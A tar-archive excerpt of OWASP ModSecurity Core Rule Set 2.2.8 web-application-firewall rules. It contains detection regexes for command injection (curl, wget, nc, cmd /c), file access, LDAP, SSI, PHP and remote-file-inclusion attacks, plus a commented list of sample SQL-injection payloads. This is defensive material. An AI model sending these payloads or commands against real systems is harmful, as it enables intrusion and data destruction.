1\.4|mafind)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|(siphon|spider)|siphon|wolf)|(?:collecto|irgrabbe)r|ducate search vxb|xtractorpro|o browse)|t(?:(?: ?h ?a ?t ?' ?s g ?o ?t ?t ?a ? 
h ?u ?r ?|his is an exploi|akeou)t|oata dragostea mea pentru diavola|ele(?:port pro|soft)|uring machine)|a(?:t(?:(?:omic_email_hunt|spid)er|tache|hens)|d(?:vanced email extractor|sarobot)|gdm79\@mail\.ru|miga-aweb\/3\.4|utoemailspider| href=)|^(?:(google|i?explorer?\.exe|(ms)?ie( [0-9.]+)?\ ?(compatible( browser)?)?)$|www\.weblogs\.com|(?:jakart|vi)a|microsoft url|user-Agent)|s(?:e(?:archbot admin@google.com|curity scan)|(?:tress tes|urveybo)t|\.t\.a\.l\.k\.e\.r\.|afexplorer tl|itesnagger|hai)|n(?:o(?:kia-waptoolkit.* googlebot.*googlebot| browser)|e(?:(?:wt activeX; win3|uralbot\/0\.)2|ssus)|ameofagent|ikto)|f(?:a(?:(?:ntombrows|stlwspid)er|xobot)|(?:ranklin locato|iddle)r|ull web bot|loodgate|oobar/)|i(?:n(?:ternet(?: (?:exploiter sux|ninja)|-exprorer)|dy library)|sc systems irc search 2\.1)|g(?:ameBoy, powered by nintendo|rub(?: crawler|-client)|ecko\/25)|(myie2|libwen-us|murzillo compatible|webaltbot|wisenutbot)|b(?:wh3_user_agent|utch__2\.1\.1|lack hole|ackdoor)|d(?:ig(?:imarc webreader|out4uagent)|ts agent)|(?:(script|sql) inject|$botname/$botvers)ion|(msie .+; .*windows xp|compatible \; msie)|h(?:l_ftien_spider|hjhj@yahoo|anzoweb)|(?:8484 boston projec|xmlrpc exploi)t|u(?:nder the rainbow 2\.|ser-agent:)|(sogou develop spider|sohu agent)|(?:(?:d|e)browse|demo bot)|zeus(?: .*webster pro)?|[a-z]surf[0-9][0-9]|v(?:adixbot|oideye)|larbin@unspecified|\bdatacha0s\b|kenjin spider|; widows|rsync|\\\r))" "capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}" SecMarker END_ROBOT_CHECK 
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_40_generic_attacks.conf���������0000664�0000000�0000000�00000047765�12164572564�0032471�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # OS Command Injection Attacks # # -=[ Rule Logic ]=- # These rules look for attempts to access OS commands such as curl, wget and cc # These commands are often used in injection attacks to force the victim web # application to initiate a connection out to a hacker site to download, compile # and install malicious toolkits such as those to participate in Botnets. 
# # -=[ References ]=- # http://projects.webappsec.org/OS-Commanding # http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\;\|\`]\W*?\bcc|\b(wget|curl))\b|\/cc(?:[\'\"\|\;\`\-\s]|$))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:normalisePath,ctl:auditLogParts=+E,block,msg:'System Command Injection',id:'950907',tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',tag:'WASCTC/WASC-31',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION-%{matched_var_name}=%{tx.0},skipAfter:END_COMMAND_INJECTION1" SecMarker END_COMMAND_INJECTION1 # # -=[ Heuristic Checks ]=- # # [ Repetitive Non-Word Chars ] # # This rule attempts to identify when multiple (4 or more) non-word characters are repeated in sequence # SecRule ARGS "\W{4,}" "phase:2,capture,t:none,t:urlDecodeUni,block,id:'960024',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',msg:'Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION-%{matched_var_name}=%{tx.0}" # # Coldfusion Injection # # -=[ Rule Logic ]=- # These rules look for the existence of undocumented ColdFusion Admin functions on input # # -=[ References ]=- # http://www.adobe.com/devnet/security/security_zone/asb99-10.html # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*
"\bcf(?:usion_(?:d(?:bconnections_flush|ecrypt)|set(?:tings_refresh|odbcini)|getodbc(?:dsn|ini)|verifymail|encrypt)|_(?:(?:iscoldfusiondatasourc|getdatasourceusernam)e|setdatasource(?:password|username))|newinternal(?:adminsecurit|registr)y|admin_registry_(?:delete|set)|internaldebug|execute)\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'Injection of Undocumented ColdFusion Tags',id:'950008',tag:'OWASP_CRS/WEB_ATTACK/CF_INJECTION',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/CF_INJECTION-%{matched_var_name}=%{tx.0},skipAfter:END_CF_INJECTION" SecMarker END_CF_INJECTION # # LDAP Injection # # -=[ Rule Logic ]=- # These rules look for common LDAP data constructions. 
#
# -=[ References ]=-
# http://technet.microsoft.com/en-us/library/aa996205%28EXCHG.65%29.aspx
#
# Rule 950010 (phase 2): inspects cookie values (except cookies whose name
# matches /__utm/), cookie names, argument names, argument values and XML
# content after htmlEntityDecode and lowercase. The pattern looks for '('
# followed by one of the attribute names objectcategory, objectclass,
# homedirectory, gidnumber, uidnumber or cn and then '=', or for one of the
# characters ! & | placed next to parentheses. A match copies the rule message
# into tx.msg and adds tx.critical_anomaly_score to tx.anomaly_score.
# NOTE(review): skipAfter:END_LDAP_INJECTION points at the marker on the very
# next line, so as written it does not skip any rule.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\((?:\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\b\W*?=|[^\w\x80-\xFF]*?[\!\&\|][^\w\x80-\xFF]*?\()|\)[^\w\x80-\xFF]*?\([^\w\x80-\xFF]*?[\!\&\|])" \
        "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'LDAP Injection Attack',id:'950010',tag:'OWASP_CRS/WEB_ATTACK/LDAP_INJECTION',tag:'WASCTC/WASC-29',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/LDAP_INJECTION-%{matched_var_name}=%{tx.0},skipAfter:END_LDAP_INJECTION"
SecMarker END_LDAP_INJECTION

#
# SSI injection
#
# -=[ Rule Logic ]=-
# These rules look for common Server-Side Include format data on input.
# # -=[ References ]=- # http://projects.webappsec.org/SSI-Injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'SSI injection Attack',id:'950011',tag:'OWASP_CRS/WEB_ATTACK/SSI_INJECTION',tag:'WASCTC/WASC-36',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SSI_INJECTION-%{matched_var_name}=%{tx.0},skipAfter:END_SSI_INJECTION" SecMarker END_SSI_INJECTION # # UPDF XSS # # -=[ Rule Logic ]=- # This rule looks for a link being submitted that contains the # fragment in a query_string. # # -=[ References ]=- # http://www.modsecurity.org/projects/modsecurity/apache/feature_universal_pdf_xss.html # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "http:\/\/[\w\.]+?\/.*?\.pdf\b[^\x0d\x0a]*#" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Universal PDF XSS URL Detected.',id:'950018',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/UPDF_XSS-%{matched_var_name}=%{tx.0}" # # Email Injection # # -=[ References ]=- # http://projects.webappsec.org/Mail-Command-Injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "[\n\r]\s*\b(?:to|b?cc)\b\s*:.*?\@" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'Email Injection Attack',id:'950019',logdata:'Matched 
Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/EMAIL_INJECTION-%{matched_var_name}=%{tx.0}" # # HTTP Request Smuggling # # -=[ Rule Logic ]=- # This rule looks for a comma character in either the Content-Length or Transfer-Encoding # request headers. This character would indicate that there was more than one request header # with this same name. In these instances, Apache treats the data in a similar manner as # multiple cookie values. # # -=[ References ]=- # http://projects.webappsec.org/HTTP-Request-Smuggling # http://article.gmane.org/gmane.comp.apache.mod-security.user/3299 # SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' "," "phase:1,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,block,msg:'HTTP Request Smuggling Attack.',id:'950012',tag:'OWASP_CRS/WEB_ATTACK/REQUEST_SMUGGLING',tag:'WASCTC/WASC-26',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/REQUEST_SMUGGLING-%{matched_var_name}=%{tx.0}" # # HTTP Response Splitting # # -=[ Rule Logic ]=- # These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters. # These characters may cause problems if the data is returned in a response header and # may be interpreted by an intermediary proxy server and treated as two separate # responses.
# # -=[ References ]=- # http://projects.webappsec.org/HTTP-Response-Splitting # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "[\n\r](?:content-(type|length)|set-cookie|location):" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'HTTP Response Splitting Attack',id:'950910',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\bhttp\/(?:0\.9|1\.[01])|<(?:html|meta)\b)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'HTTP Response Splitting Attack',id:'950911',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING-%{matched_var_name}=%{tx.0}" # # RFI Attack # # -=[ Rule Logic ]=- # These rules look for common types of Remote File Inclusion (RFI) attack methods. # - URL Contains an IP Address # - The PHP "include()" Function # - RFI Data Ends with Question Mark(s) (?) 
# - RFI Host Doesn't Match Local Host # # -=[ References ]=- # http://projects.webappsec.org/Remote-File-Inclusion # http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html # SecRule ARGS "^(?i)(?:ht|f)tps?:\/\/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Remote File Inclusion Attack',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'950117',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/RFI',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}" SecRule QUERY_STRING|REQUEST_BODY "(?i:(\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(ht|f)tps?:\/\/)" \ "phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:urlDecodeUni,capture,ctl:auditLogParts=+E,block,msg:'Remote File Inclusion Attack',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'950118',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/RFI',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}" SecRule ARGS "^(?i)(?:ft|htt)ps?(.*?)\?+$" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Remote File Inclusion Attack',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'950119',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/RFI',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}" SecRule ARGS "^(?:ht|f)tps?://(.*)$" \ 
"chain,phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'950120',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/RFI'" SecRule TX:1 "!@beginsWith %{request_headers.host}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RFI-%{matched_var_name}=%{tx.1}" # # Prequalify Request Matches # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile modsecurity_40_generic_attacks.data" \ "phase:2,id:'981133',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,nolog,pass,setvar:tx.pm_score=+1" SecRule TX:PM_SCORE "@eq 0" "phase:2,id:'981134',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,pass,skipAfter:END_PM_CHECK,nolog" # # Begin RegEx Checks for target locations that matched the prequalifier checks # # # Session fixation # # -=[ References ]=- # http://projects.webappsec.org/Session-Fixation # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i)(?:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:urlDecodeUni,capture,ctl:auditLogParts=+E,block,msg:'Session Fixation Attack',id:'950009',tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',tag:'WASCTC/WASC-37',tag:'OWASP_TOP_10/A3',tag:'PCI/6.5.7',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SESSION_FIXATION-%{matched_var_name}=%{tx.0}" SecRule ARGS_NAMES "@pm jsessionid aspsessionid asp.net_sessionid phpsession 
phpsessid weblogicsession session_id session-id cfid cftoken cfsid jservsession jwsession" \ "chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'7',t:none,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'Session Fixation',id:'950003',tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',tag:'WASCTC/WASC-37',tag:'OWASP_TOP_10/A3',tag:'PCI/6.5.7',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2'" SecRule REQUEST_HEADERS:Referer "^(?:ht|f)tps?://(.*?)\/" "chain,capture" SecRule TX:1 "!@beginsWith %{request_headers.host}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SESSION_FIXATION-%{matched_var_name}=%{tx.0}" SecRule ARGS_NAMES "@pm jsessionid aspsessionid asp.net_sessionid phpsession phpsessid weblogicsession session_id session-id cfid cftoken cfsid jservsession jwsession" \ "chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'7',t:none,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'Session Fixation',id:'950000',tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',tag:'WASCTC/WASC-37',tag:'OWASP_TOP_10/A3',tag:'PCI/6.5.7',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2'" SecRule &REQUEST_HEADERS:Referer "@eq 0" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SESSION_FIXATION-%{matched_var_name}=%{tx.0}" SecMarker END_SESSION_FIXATION # # File Injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" \ "phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:cmdLine,ctl:auditLogParts=+E,block,msg:'Remote File Access 
Attempt',id:'950005',tag:'OWASP_CRS/WEB_ATTACK/FILE_INJECTION',tag:'WASCTC/WASC-33',tag:'OWASP_TOP_10/A4',tag:'PCI/6.5.4',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/FILE_INJECTION-%{matched_var_name}=%{tx.0}" SecMarker END_FILE_INJECTION # # Command access # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\.exe\b|cmd(?:(?:32)?\.exe\b|\b\W*?\/c))" \ "phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:cmdLine,ctl:auditLogParts=+E,block,msg:'System Command Access',id:'950002',tag:'OWASP_CRS/WEB_ATTACK/FILE_INJECTION',tag:'WASCTC/WASC-31',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_ACCESS-%{matched_var_name}=%{tx.0}" SecMarker END_COMMAND_ACCESS # # Command injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\b(?:(?:n(?:et(?:\b\W+?\blocalgroup|\.exe)|(?:map|c)\.exe)|t(?:racer(?:oute|t)|elnet\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\.exe|echo\b\W*?\by+)\b|c(?:md(?:(?:\.exe|32)\b|\b\W*?\/c)|d(?:\b\W*?[\\/]|\W*?\.\.)|hmod.{0,40}?\+.{0,3}x))|[\;\|\`]\W*?\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\b|g(?:\+\+|cc\b)))" \ "phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:cmdLine,ctl:auditLogParts=+E,block,msg:'System Command Injection',id:'950006',tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',tag:'WASCTC/WASC-31',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched 
Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION-%{matched_var_name}=%{tx.0}" SecMarker END_COMMAND_INJECTION # # PHP injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<\?(?!xml)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,block,msg:'PHP Injection Attack',id:'959151',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.2',tag:'WASCTC/WASC-25',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE4',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i)(?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\$_(?:(?:pos|ge)t|session))\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,ctl:auditLogParts=+E,block,msg:'PHP Injection Attack',id:'958976',tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.2',tag:'WASCTC/WASC-25',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE4',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{matched_var_name}=%{tx.0}" SecRule QUERY_STRING "@pm allow_url_include= safe_mode= suhosin.simulation= 
disable_functions= open_basedir= auto_prepend_file= php://input" \ "phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'9',t:none,t:urlDecodeUni,t:lowercase,ctl:auditLogParts=+E,block,msg:'PHP Injection Attack',id:'958977',tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.2',tag:'WASCTC/WASC-25',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE4',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{matched_var_name}=%{tx.0}" SecMarker END_PM_CHECK �����������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_41_sql_injection_attacks.conf���0000664�0000000�0000000�00000125204�12164572564�0033700�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- # # References: # # SQL Injection Pocket Reference (via @LightOS) - # https://docs.google.com/Doc?docid=0AZNlBave77hiZGNjanptbV84Z25yaHJmMjk # # SQLi Filter Evasion Cheat Sheet - # http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/ # # SQL Injection Cheat Sheet - # http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ # # SQLMap's Tamper Scripts (for evasions) # https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/ # # # -=[ Detect SQL Comment Sequences ]=- # # Example Payloads Detected: # ------------------------- # OR 1# # DROP sampletable;-- # admin'-- # DROP/*comment*/sampletable # DR/**/OP/*bypass blacklisting*/sampletable # SELECT/*avoid-spaces*/password/**/FROM/**/Members # SELECT /*!32302 1/0, */ 1 FROM tablename # ‘ or 1=1# # ‘ or 1=1-- - # ‘ or 1=1/* # ' or 1=1;\x00 # 1='1' or-- - # ' /*!50000or*/1='1 # ' /*!or*/1='1 # 0/**/union/*!50000select*/table_name`foo`/**/ # ------------------------- # SecRule 